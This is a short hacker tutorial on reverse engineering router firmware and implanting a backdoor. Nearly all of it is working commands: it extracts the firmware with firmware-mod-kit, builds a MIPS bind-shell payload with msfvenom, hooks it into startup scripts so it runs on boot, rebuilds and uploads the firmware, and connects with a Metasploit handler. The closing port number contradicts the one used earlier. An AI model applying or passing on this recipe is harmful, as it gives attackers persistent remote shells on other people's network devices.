Reverse Router Firmware & Backdooring It…

Router firmware is a critical component of any network infrastructure, and its security is often overlooked. As a hacker, understanding how to reverse engineer and backdooring router firmware. In this write-up, we will see the process of reverse engineering and backdooring a router firmware.

Tools and Requirements

• A Linux machine (Kali Linux)
• Binwalk: A firmware analysis tool
• Firmware-Mod-Kit (github.com/rampageX/firmware-mod-kit)

Step 1: Download your target router firmware

Step 2: Unzip

Step 3: Download Firmware-mod-kit

git clone https://github.com/rampageX/firmware-mod-kit

sudo apt-get install git build-essential zlib1g-dev liblzma-dev python3-magic autoconf python-is-python3

Step 4: Extract the firmware

firmware-mod-kit/extract-firmware.sh firmware.bin

Step 5: go to the rootfs folder

Step 6: Create backdoor by using metasploit

Note: first check the firmware endian is little endian or other endian.

cd bin
msfvenom -p linux/mipsle/shell_bind_tcp LPORT=1337 -f elf > backdoor
chmod 777 backdoor

Step 7: make backdoor execute

cd ...
find . -name "*.sh" #this command will search all the .sh files
#add "/bin/backdoor &" this line in .sh file that you finded

Step 8: Rebuild the firmware

firmware-mod-kit/build-firmware.sh

Step 9: Firmware upload

• Go to admin panel and login
• find firmware upgrade option

• Now upload your modified firmware…

~$ Now its time to get access shell from router!

Step 9: Access Router Shell

Run Metasploit

msfconsole
use exploit/multi/handler
set payload linux/mipsle/shell_bind_tcp
set LPORT 1337
set rhost 192.168.0.1
exploit

my backdoor running on port 40443